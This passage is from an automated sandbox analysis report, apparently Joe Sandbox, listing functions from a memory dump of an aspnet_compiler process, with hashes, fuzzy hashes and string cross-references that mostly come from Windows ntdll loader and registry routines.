String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 15df46e5962aeaa4dc4dc8c14afbe76e73d8de0edca1c992790240db428669e7
Instruction ID: 432ce6887f2e17175578b7a409de9cffd52727d7332b73247030ef881bc1906b
Opcode Fuzzy Hash: 15df46e5962aeaa4dc4dc8c14afbe76e73d8de0edca1c992790240db428669e7
Instruction Fuzzy Hash: E34118742002909FEF29CF9DC084B797BE49F81348F58C46DE58ECB696E674D885C752

Function 01A9C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A9C1C5
PreferredUILanguages, xrefs: 01A9C212
@, xrefs: 01A9C1F1

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: a7a4de6a46fc1a004c20004e8e5c23751e166f792279a1e9e6ebf80515437823
Instruction ID: 4c56a1711b4ba4a640df379ca38429a146576fea08d0b4f818bc66fedc67c9ae
Opcode Fuzzy Hash: a7a4de6a46fc1a004c20004e8e5c23751e166f792279a1e9e6ebf80515437823
Instruction Fuzzy Hash: F9418371E00619FBDF11EBD8C991FEEBBF8AB54710F1440AAE609B7284D7749A84CB50

Function 01A74144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 01A74160
LdrpResValidateFilePath Exit, xrefs: 01A74172
@, xrefs: 01A74225

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: c439424297b84e7817556116f38f06e6c0ab23eaa76b2c5ac2f8c9ad72a01383
Instruction ID: 71bf8d1764c7be3c04f6d04bd2fe59d1dcdf10dd3008c11f5c69a9341980b3e0
Opcode Fuzzy Hash: c439424297b84e7817556116f38f06e6c0ab23eaa76b2c5ac2f8c9ad72a01383
Instruction Fuzzy Hash: 80412572A047498FEB26DBD9DC40BADBBB8FF99340F18045AD905EB791D7348A01CB51

Function 01A133A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

Actx , xrefs: 01A133AC
SXS: %s() passed the empty activation context data, xrefs: 01A529FE
RtlCreateActivationContext, xrefs: 01A529F9

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 768610a3051dfab8d8d949bc7fc238d585329a82124c88b80a6043520b882658
Instruction ID: 3809523b29bbdd55fbfb18471ea96c699bbf5f2a2457ea6a003647fc97eb98ec
Opcode Fuzzy Hash: 768610a3051dfab8d8d949bc7fc238d585329a82124c88b80a6043520b882658
Instruction Fuzzy Hash: 20310332640306DFEF26DF58D880B967BA5BF48721F05842AFE099F24ACB70E841C790

Function 01A6B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

@, xrefs: 01A6B670
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 01A6B632
GlobalFlag, xrefs: 01A6B68F

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 9d131b64160f8386b027970fe88f1201f723d04d4c69b76820f31932d8c3da6f
Instruction ID: 0aabf39f543f2c5f11bf027760b94c858d6bf29bd6c0fb80423562a47205ed25
Opcode Fuzzy Hash: 9d131b64160f8386b027970fe88f1201f723d04d4c69b76820f31932d8c3da6f
Instruction Fuzzy Hash: C8314CB5A0021AAFEB10EF99CD90BEEBBBCEF44744F14446AE605E7150D7749E00CBA4

Function 01A21270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

BuildLabEx, xrefs: 01A2130F
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 01A2127B
@, xrefs: 01A212A5

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: 5ee91cd8bd84bf3ba5731624bc8ffc43ed4a6d7e49d66d0debe5db39b5e10579
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 95318172A00629BFDB11AF99CD44EEEBBBDEB94754F104425EA14A7260D730DA058B90

Function 01A620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 01A620F3
minkernel\ntdll\ldrinit.c, xrefs: 01A62104
LdrpInitializationFailure, xrefs: 01A620FA

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 738fe41110167472482141ce4b4ae194381cc86226df9b1df1a8d178bdaf186c
Instruction ID: d08c68a4ad1476670356f9ed2c0802ef688a51ffa3ac005ec4efe588bebe998c
Opcode Fuzzy Hash: 738fe41110167472482141ce4b4ae194381cc86226df9b1df1a8d178bdaf186c
Instruction Fuzzy Hash: 08F02278640708ABEB24E70CCD46F9A3B7CEB80F04F100029FB4477281D2F0A900CA82

Function 019F03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A44D8A

Strings

#%u, xrefs: 01A44D82

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: dbffcfca558e3c22ce1de84d477125c48c5f4723f796f44fff10b763c921b25a
Instruction ID: 116ebb6ec6ca9488bf261eb8bda1d6b8f8f98ed4d26c21ec1ddd38868a5f0bc2
Opcode Fuzzy Hash: dbffcfca558e3c22ce1de84d477125c48c5f4723f796f44fff10b763c921b25a
Instruction Fuzzy Hash: 9E713D71A0014AAFDB01DF99C990FAEB7F8FF58704F154069EA05E7251EA38EE45CB60

Function 019F52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 019F5445
@, xrefs: 019F55A3

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d1675be730b497496210e263397a88ba1c2979220b07b7fa56cc371f35e06bcf
Instruction ID: 27e84ecf66b7dce21ef20ae9bd6eb12249d82a248c25a9359062bef413595281
Opcode Fuzzy Hash: d1675be730b497496210e263397a88ba1c2979220b07b7fa56cc371f35e06bcf
Instruction Fuzzy Hash: 5932B070508312ABE724CF18C480B7EBBE5EFC5755F16491EFA9987290E774D884CB52

Function 01AAA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01AAA44B
`, xrefs: 01AAA551

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: e5fe53fc57322e72315f0d36e5587ec00bbc7c0aaa329babe31dae4309bc569a
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 00C1C0312043429BEB25CF28C941B6BBBE5BFC4318F484A2DF696CB291D779D905CB91

Function 019E04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 019E0540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019E063D

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: b8b013ad5c56ddb253598f994272f3ee7b36384806fa5eeffe85753cf4e791d9
Instruction ID: fb81039238f2ceb96cbf75db728fd1ef13ff88600c7be0ff4cdf1725494abb13
Opcode Fuzzy Hash: b8b013ad5c56ddb253598f994272f3ee7b36384806fa5eeffe85753cf4e791d9
Instruction Fuzzy Hash: 7451ED716007429BC726EF69C5487A3BBE8AF84700F18493EE69E87241E7B0D505CF91

Function 019EA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 019EA2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 019EA309

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 86112a5387f4656728c5c50e7e7d634057ca8b4c625d34ef986d053ddc85d41a
Instruction ID: 4a7a0fbc69c9fb64ba960778c4bda008ca5c58f89025e93657b5ff23a58762a4
Opcode Fuzzy Hash: 86112a5387f4656728c5c50e7e7d634057ca8b4c625d34ef986d053ddc85d41a
Instruction Fuzzy Hash: 6E41BE30A04649DFEB16CF59D844B6EBBF4FF84700F1444AAE918DB2A1E3B5DA41CB50

Function 01A735BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 01A735EC
LdrResGetRCConfig Exit, xrefs: 01A735FE

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 6c00e42738ae80e44c4ff8958697878d01ed00ac011eb1edb905c7db02f1c4b5
Instruction ID: 7e5c5a983f2040d6a2edeab76bedf2e5d665da30c1bdf8543f17e9780de92935
Opcode Fuzzy Hash: 6c00e42738ae80e44c4ff8958697878d01ed00ac011eb1edb905c7db02f1c4b5
Instruction Fuzzy Hash: 7731CD312087429BE711DB69D954B2BBBE4FF85710F0A086DFA54CB390EB34DA05CB92

Function 01A1329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

.Local\, xrefs: 01A132B5
@, xrefs: 01A1330D

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 83279d6d21113277274e9e99b5cda3a62853c8a41966926c7438c97fc4006f1f
Instruction ID: b7d181a9b2843277f5465c35301c50834d9ba7b02b70b834317b796d6f19b2c4
Opcode Fuzzy Hash: 83279d6d21113277274e9e99b5cda3a62853c8a41966926c7438c97fc4006f1f
Instruction Fuzzy Hash: AB3190B2509305AFDB11DF28C580A6BBBF8FF85664F44092EF99583350DA34DD04CB96

Function 01A134B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 01A52A90
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 01A52A95

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 11d1a7569ea2cc691040eece691b6acf5f92c0b513682a3172dc5e77305f67c5
Instruction ID: 39bdd672d8bb83be64053d774fb10b413f497ec45118b00ab48af515d59da0c3
Opcode Fuzzy Hash: 11d1a7569ea2cc691040eece691b6acf5f92c0b513682a3172dc5e77305f67c5
Instruction Fuzzy Hash: F2110A75744205FBEB258E5D8D41F6A76ADAFD4B64F1880297B04DB245D674CD0087A0

Function 01A1A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 01A1A5E4
Threadpool!, xrefs: 01A1A5E9

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: d2d9fa9d98954d1b6cb527cdfc0c46a2f1ad11df5f86b12b479be9b279a7f51c
Instruction ID: d8dd8ec3dd2485961a308d773d5a6f9f0e13fbf5ccc54653a4224498d24dacaf
Opcode Fuzzy Hash: d2d9fa9d98954d1b6cb527cdfc0c46a2f1ad11df5f86b12b479be9b279a7f51c
Instruction Fuzzy Hash: 2101DCB2246B80AFE321DF24CE45B2677E8E794B25F058939E66CC7194E334E804CB46

Function 019E7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ada8e1514fe4609f3909a9ba2c73e5e7e4de8b0bc551643362ce292e49f94fd9
Instruction ID: 7da270221569aad4f53674f7bee1a4fae3a0fba1ead8cf71d28dd87b4ccadc21
Opcode Fuzzy Hash: ada8e1514fe4609f3909a9ba2c73e5e7e4de8b0bc551643362ce292e49f94fd9
Instruction Fuzzy Hash: EEA18C71608342DFD326DF68D484A2ABBEABF98704F10496DF58987351EB30E945CF92

Function 01A6F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 01A6F867

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: 13c2495ad864cc6b8068a0ed61ba2a517a00138a60dd73befb38c0f8e6ac485e
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: 96518972604316AFE7229F28D950F6ABBE8FB94750F040929FA94D7290D7B4ED04CB91

Function 01A9B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 01A9B28F

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: c9595ec8c6b1aecb96532f95647075e08b699ea3eda78674dff96d0e58851ceb
Instruction ID: 1fee7ad40e810db13bc1c2b45375a6da84f6ad1b93a99c449992ba8f38581e66
Opcode Fuzzy Hash: c9595ec8c6b1aecb96532f95647075e08b699ea3eda78674dff96d0e58851ceb
Instruction Fuzzy Hash: 55418036D00219EBDF11DB99D840EEFBBF9AF44650F05416AEE15AB650D6349E80C7B0

Function 01A8705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 01A870A4

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: 54cfcdc959b130d822dc160676e5172b23cce82bc38762021e35399427028069
Instruction ID: 8738b46c0a37bddf925baa403a29f3f404eb4f625d3e5c0b49388849858bde6a
Opcode Fuzzy Hash: 54cfcdc959b130d822dc160676e5172b23cce82bc38762021e35399427028069
Instruction Fuzzy Hash: 49415E75502B4247E731BBF8E985BA93FE4BB40B24F240119ED5A8B0D5CB744487C791

Function 01A17505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 01A54622

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: 3da2c195509e5889f2dfb53268e2e7acfaa302c365265b34d6da2d6ac16de0ba
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: BB41E075A04256EBCF22DF98C490BBEBBB5FF84321F04405AE906A7244DB30D981CBA1

Function 019E5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 019E50BF

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: a94deb5cd49d0c8491efb2df09a8a91bc1dbcbd540d0d64fa0b8c364575ca103
Instruction ID: 5f8da4726d3fca354bb7cefaf4dfc546c3d330fc032971864fe46feaf88c9eb0
Opcode Fuzzy Hash: a94deb5cd49d0c8491efb2df09a8a91bc1dbcbd540d0d64fa0b8c364575ca103
Instruction Fuzzy Hash: 631184383096028BFB27491DC858A767AD9FB8522EF37852AF55DCB391DA71DC41C381

Function 01A3739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7c5e3cfad74cfbeb5b4a71e728063e6f0113ece9ea1eec11347503242d932f
Instruction ID: afcd3ac07fb4ac00ffe1fe49b8f245193a972c94162c4459c9e75575ad25a19c
Opcode Fuzzy Hash: 3d7c5e3cfad74cfbeb5b4a71e728063e6f0113ece9ea1eec11347503242d932f
Instruction Fuzzy Hash: 264292B1A006169FDB19CF9DC490ABEB7B2FFC8314B18855DE556AB381D734E842CB90

Function 01A0B2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8eff559d9c8b5aa8143eeddc32fd7e410102bb484c75fdf37197233275271e
Instruction ID: a977c66e6b04bc923e950c12fb89f1abd347849493d5258228a366e42d139a11
Opcode Fuzzy Hash: 6e8eff559d9c8b5aa8143eeddc32fd7e410102bb484c75fdf37197233275271e
Instruction Fuzzy Hash: 0932C275E01219DFDF15CFA8DA90BAEBBB1FF94714F180029E805AB391E7359901CBA1

Function 01A8A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 697365dd014c1ddd5dbe802f463faf57eb0c0798e5b446aa5db57b4aad1e0ef8
Instruction ID: 5bbce8c0c2623d2ed1f970f77804ceb087e15a9aaa6aa3f1957191763ef35709
Opcode Fuzzy Hash: 697365dd014c1ddd5dbe802f463faf57eb0c0798e5b446aa5db57b4aad1e0ef8
Instruction Fuzzy Hash: 3D22BF742046618BEB25EF2DC094772BBF1AF44304F08845BEA97CF286E775E492DB60

Function 019E65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d644f2eb7bf86fa2ecf596b20597a56a64b8af8855df6dc4fe1a3cd0e7bc9c73
Instruction ID: 253e7ceca80dbbf5723c220c3a4aa9b868b705926be5dbf08949a5a6f6bcd355
Opcode Fuzzy Hash: d644f2eb7bf86fa2ecf596b20597a56a64b8af8855df6dc4fe1a3cd0e7bc9c73
Instruction Fuzzy Hash: 58E19C71608342CFC716CF2CC494A6ABBE4FF99314F058A6DE99987351EB31E905CB92

Function 019D8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 448dd7b6e8efb9e4e15eeecc6600e1940c5c22c3bcc00e39661711ac7fc342f0
Instruction ID: 103075e668d6e13b70892ba616f7fc58b77852d54bcfcff415d2374e70f01fe6
Opcode Fuzzy Hash: 448dd7b6e8efb9e4e15eeecc6600e1940c5c22c3bcc00e39661711ac7fc342f0
Instruction Fuzzy Hash: A9D1E271A002069BDB14DF68C881FBAB7B5FF94714F05862DF91ADB282E734D951CB60

Function 019FF460 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb193480076805e79ded5cc76a8c6d07bc86215c4e4765ef0d8f47d8b60b10d3
Instruction ID: 5f76990658fc21d6e84693f6aac015c575ba3b6b7ef5ed703cb20bf19ca84094
Opcode Fuzzy Hash: fb193480076805e79ded5cc76a8c6d07bc86215c4e4765ef0d8f47d8b60b10d3
Instruction Fuzzy Hash: E7C16733A01215EBDB25CF2CC494BB97BA5FF84714F19405DEA4A9B3A6EB30D941CB90

Function 019F0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 90b25d206524194a849f0cc4aa5fe54ffe21494be4775216ae338d5862d84c07
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: E4B11731600646AFDB21DB68C854BBEBBFBAFC8300F184599E656D7282D730ED41CB90

Function 01A090DB Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0195c7197124cf428f0a7623e48406b610b21574c2120a8b8f5535b140626ac9
Instruction ID: 3c893937208d6183af469a3d43a0c080f57c7f8edde699e8dd07044c0bcebd88
Opcode Fuzzy Hash: 0195c7197124cf428f0a7623e48406b610b21574c2120a8b8f5535b140626ac9
Instruction Fuzzy Hash: 15A16E71900616AFEB12DFA8CC45FBF7BB9AF99750F010058FA04AB2A0D7759D01CBA0

Function 019E83C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fe9fd3c770303e54ccc6540c32e9781f6aa4baeb5f627c46e10df0840b09da3
Instruction ID: 21f8b1cef04b8a082145253ad4c896ca26ec635e538a73236f3b47963a3ec237
Opcode Fuzzy Hash: 7fe9fd3c770303e54ccc6540c32e9781f6aa4baeb5f627c46e10df0840b09da3
Instruction Fuzzy Hash: D8C158742083418FE765CF19C484BABB7E8FF88704F44496DE98987291EB74E948CF92

Function 019DC427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3476c9aefe177a35a58a79e52f72dffb90070b086d1651d0cbe54ade36be00f
Instruction ID: 30808c129744701726177ad6d22bd97c8102a94e3f992293f1655f27fdb1a74c
Opcode Fuzzy Hash: a3476c9aefe177a35a58a79e52f72dffb90070b086d1651d0cbe54ade36be00f
Instruction Fuzzy Hash: F7B17F70A042668BDB25CF68C990BA9B3B5EF84710F44C5EDD54EE7281EB309D86CF20

Function 01A0E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_19b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd2f23a6d3ce4ef360646886758e14045c316476f89102f3df8355277ee71aa2
Instruction ID: 33896f77932e1ad54418810aa64c4c72a39528b9d3adacc7df0287c5ff7b5d4d
Opcode Fuzzy Hash: bd2f23a6d3ce4ef360646886758e14045c316476f89102f3df8355277ee71aa2
